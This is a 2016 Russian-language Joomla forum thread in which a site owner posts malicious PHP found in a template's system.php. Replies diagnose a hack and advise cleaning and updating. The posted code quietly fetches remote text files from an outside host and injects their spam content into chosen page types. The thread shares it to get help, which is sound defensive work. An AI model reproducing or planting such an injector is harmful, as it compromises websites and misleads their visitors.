Новости Joomla

Совет по Joomla: использовать выключенное состояние для кнопок в списках элементов админки

Онлайн-трансляции Joomla-разработки Игоря Бердичевского

20 лет Joomla: Ринат Кажетов

20 лет Joomla: Ринат Кажетов.В 2025 году Joomla исполнилось 20 лет

В 2025 году Joomla исполнилось 20 лет. Вокруг неё сложилось большое интернациональное русскоязычное сообщество. На сайте нашего сообщества и на Хабре к юбилею были собраны интервью с его видными представителями. Сегодня мы читаем интервью с Ринатом Кажетовым (@rkazhet). Ринат - один из администраторов чата русскоязычного Joomla-сообщества, из Казахстана. Это человек, который всегда знает или найдёт нужную ссылку, пристально следит за новостями в мире Joomla, многое узнаёт первым и просто очень отзывчивый человек. Интервью с Ринатом взял Евгений Сивоконь.

Читать интервью

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 8 Ответов
  • 1720 Просмотров
*

LadaDed

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Чужие ссылки
« : 18.02.2016, 20:30:39 »
Поймал на сайте чужие ссылки.
Долго копал, не мог найти, откуда. Потом заметил, что у меня в разделе component перед жидоком стоит какой-то не понятный require_once
Он вызывает system.php (название -то какое!)
А там

Код: php
<?php
/* Это та самая блоха для Joomla, которую я поймал! */

	$app=JFactory::getApplication();
	$option5=$app->input->getCmd('option','');
	$view5=$app->input->getCmd('view','');
	$layout5=$app->input->getCmd('layout','');
	$menu5=$app->getMenu(); 
	$files = 'http://joomla.cv.ua/j32.txt';
	$file_headers = @get_headers($files);
	if(($menu5->getActive()==$menu5->getDefault())||($view5=='featured')) 
	if($file_headers[0] == 'HTTP/1.1 200 OK') 
		{ $content = file("http://joomla.cv.ua/j07.txt");
		$data = implode($content); 
		echo $data; } 
	if(($option5=='com_content')&&($view5=='category')&&($layout5!=='blog')) 
		if($file_headers[0] == 'HTTP/1.1 200 OK') 
		{ $content = file("http://joomla.cv.ua/j08.txt"); 
		$data = implode($content); echo $data; }
	if(($option5=='com_content')&&($view5=='article'))
	if($file_headers[0] == 'HTTP/1.1 200 OK') 
	{ $content = file("http://joomla.cv.ua/j09.txt"); 
	$data = implode($content); echo $data; } 
	if(($option5=='com_content')&&($layout5=='blog'))
	if($file_headers[0] == 'HTTP/1.1 200 OK') 
	{ $content = file("http://joomla.cv.ua/j10.txt"); 
	$data = implode($content); echo $data; }
	if (($option5=='com_content')&&($layout5=='default'))
	if($file_headers[0] == 'HTTP/1.1 200 OK')
	{ $content = file("http://joomla.cv.ua/j11.txt");
	$data = implode($content); echo $data; } 
?>

т.е. это какой-то Украинец, из Кабо Верде сидит и пишет текстовые файлы с такими вот пакостями, а они потом у меня появляются.
Записан
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Чужие ссылки
« Ответ #1 : 18.02.2016, 20:33:04 »
Взломали вас. Надо чистить сайтик. Какая версия Joomla?
Записан
*

LadaDed

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Re: Чужие ссылки
« Ответ #2 : 18.02.2016, 21:13:57 »
Да это даже не ломали, а так просетапили. Версия 2.5 28
Там на хосте нельзя установить 3 - говорят, не хватит ресурса..
А меня позвали сайт делать, когда уже все было установлено и даже начато. Вот в шаблоне ict-novotela такая бяка.
Я то искал base64_decode даже sql прочесал. Ну, нету этих текстов и все! А они, оказывается, лежат вообще на другом адресе. Найдешь их, как-же!
Записан
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Чужие ссылки
« Ответ #3 : 18.02.2016, 21:19:44 »
если 2.5.28 с последними фиксами - то дыр в ней нет (скажем так пока не нашли :) ), так что обновляться на Ж3 не очень обязательно. ну по крайней мере из-за этой причины. соответственно, либо взломали до обновления, и прост о пока не проявляли себя, либо 2.5.28, но последние фиксы безопасности не установили. тогда 2.5.28 дырявая.
Записан
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

LadaDed

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Re: Чужие ссылки
« Ответ #4 : 18.02.2016, 21:34:27 »
Да, надо будет там все обновить..
Я как-то привык на Амиро все делать, Дорого, конечно, но зато все такие штуки-дрюки не моя проблема.
Если что-то глючит - в службу поддержки и пускай они там и морочатся.
Но это были интернет-магазины, потом для ресторана делал, Там народ с деньгами, Сами говорят - не надо нам экономии, надо быстро и надежно.
А тут небольшой сайтик, практически, знакомые попросили.
А скупой платит дважды.
Записан
*

SeBun

  • BanMaster
  • 4030
  • 259 / 5
  • @SeBun48
Re: Чужие ссылки
« Ответ #5 : 19.02.2016, 09:15:56 »
Цитата: LadaDed от 18.02.2016, 21:34:27
А скупой платит дважды.
Даже трижды.

Добавлю, что целевой взлом сайта делается крайне редко, сейчас это работает не так, как в лихих 90-х, сейчас программы ломают сайты тоннами. И ваш, скорее всего, не исключение. dmitry_stas правильно сказал, 2.5.28 вполне себе неплохая, но она редко используется в чистом виде. Обычно обвешана различными расширениями, через них и получают доступ.
Записан
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Чужие ссылки
« Ответ #6 : 19.02.2016, 10:39:41 »
та там даже без сторонних расширений может быть проблема. я имел в виду, что просто установленной 2.5.28 мало для уверенности в безопасности. там было еще 2 фикса безопасности выпущено, а версия не менялась при этом, потому что фиксы были выпущены когда поддержка 2.5 уже закончилась.
Записан
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

natalyaegorova

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Re: Чужие ссылки
« Ответ #7 : 03.08.2016, 00:55:15 »
Ребят, ради бога, подскажите что делать. Поймала на сайте такую же вредоносную фигню с Joomla.cv.ua!  Как от него избавиться? Сайт третьи сутки "висит"! Прописался в шаблоне в файле system.php. ДЖ версия 3.4.8.
Записан
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Чужие ссылки
« Ответ #8 : 03.08.2016, 09:50:14 »
Удалять, лечить, обновлять.
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

 Ответов: 2
Просмотров: 2486 		Последний ответ 14.02.2024, 13:15:59
от wishlight
Непонятные ссылки в индексе Яндекс

Автор Forgiving

 Ответов: 16
Просмотров: 1484 		Последний ответ 13.09.2021, 14:17:20
от ForQue
Вирус на сайте, генерирующий ссылки на магазин.

Автор chernykh

 Ответов: 15
Просмотров: 1885 		Последний ответ 23.04.2018, 21:58:08
от ProtectYourSite
Ссылки типа ?page=Igri-onlajn-na-dengi-avtomati-vulkan

Автор orkl

 Ответов: 4
Просмотров: 1379 		Последний ответ 13.04.2017, 20:54:51
от ProtectYourSite
Левые ссылки на сайте. Как бороться?!

Автор k.upak

 Ответов: 28
Просмотров: 1818 		Последний ответ 20.02.2017, 20:18:44
от flyingspook